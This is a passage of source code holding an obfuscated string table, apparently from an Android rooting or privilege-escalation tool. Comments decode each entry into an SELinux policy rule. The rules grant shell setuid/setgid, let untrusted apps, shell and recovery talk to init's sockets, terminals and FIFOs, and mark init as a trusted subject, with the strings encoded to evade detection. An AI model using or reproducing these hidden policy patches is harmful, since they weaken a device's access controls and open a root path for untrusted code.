    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:lnk_file:dir:write"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:lnk_file:dir:getattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:lnk_file:dir:setattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:lnk_file:dir:relabelfrom"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:lnk_file:dir:relabelto"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:zygote:process:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:system_server:process:getattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:system_app:process:getattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:platform_app:process:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:untrusted_app:process:getattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:zygote:process:getattr"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_server:process:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_app:process:getattr"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:platform_app:process:getattr"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:untrusted_app:process:getattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:zygote:process:getattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_server:process:getattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_app:process:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:platform_app:process:getattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:untrusted_app:process:getattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x3a\x0e\x09", // "allow:shell:shell:capability:setuid"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x04\x0e\x09", // "allow:shell:shell:capability:setgid"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:shell:init:unix_stream_socket:connectto"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:shell:init:unix_stream_socket:read"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:shell:init:unix_stream_socket:write"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:shell:untrusted_app:unix_stream_socket:connectto"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:shell:untrusted_app:unix_stream_socket:read"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:shell:untrusted_app:unix_stream_socket:write"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:recovery:init:unix_stream_socket:connectto"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:recovery:init:unix_stream_socket:read"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:init:unix_stream_socket:write"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:recovery:untrusted_app:unix_stream_socket:connectto"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:recovery:untrusted_app:unix_stream_socket:read"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:untrusted_app:unix_stream_socket:write"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:shell:init:fifo_file:read"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:shell:init:fifo_file:write"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:shell:init:fifo_file:ioctl"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:shell:init:fifo_file:getattr"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:init:fifo_file:read"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:init:fifo_file:write"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:recovery:init:fifo_file:ioctl"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:init:fifo_file:getattr"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:shell:devpts:chr_file:open"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:shell:devpts:chr_file:read"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:shell:devpts:chr_file:write"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:shell:devpts:chr_file:ioctl"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:shell:devpts:chr_file:getattr"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:shell:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:shell:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:shell:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:shell:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:shell:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:devpts:chr_file:open"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:devpts:chr_file:read"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:devpts:chr_file:write"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:recovery:devpts:chr_file:ioctl"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:devpts:chr_file:getattr"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:recovery:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x2d\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x32\x31\x30\x39\x37\x3a\x30\x39\x0a\x09\x0c\x07\x0f\x0a\x00\x39", // "attradd:init:mlstrustedobject"
    "\x63\x53\x2e\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x32\x31\x30\x39\x37\x3a\x30\x39\x0a\x09\x30\x3a\x07\x0f\x0a\x00\x39", // "attradd:init:mlstrustedsubject"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:system_server:init:unix_stream_socket:connectto"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:system_server:init:unix_stream_socket:read"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:system_server:init:unix_stream_socket:write"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:system_app:init:unix_stream_socket:connectto"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:system_app:init:unix_stream_socket:read"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:system_app:init:unix_stream_socket:write"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:platform_app:init:unix_stream_socket:connectto"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:platform_app:init:unix_stream_socket:read"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:platform_app:init:unix_stream_socket:write"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:untrusted_app:init:unix_stream_socket:connectto"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:untrusted_app:init:unix_stream_socket:read"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:untrusted_app:init:unix_stream_socket:write"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:init:unix_stream_socket:connectto"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:init:unix_stream_socket:read"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:init:unix_stream_socket:write"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:init_shell:unix_stream_socket:connectto"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:init_shell:unix_stream_socket:read"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:init_shell:unix_stream_socket:write"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:recovery:unix_stream_socket:connectto"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:recovery:unix_stream_socket:read"
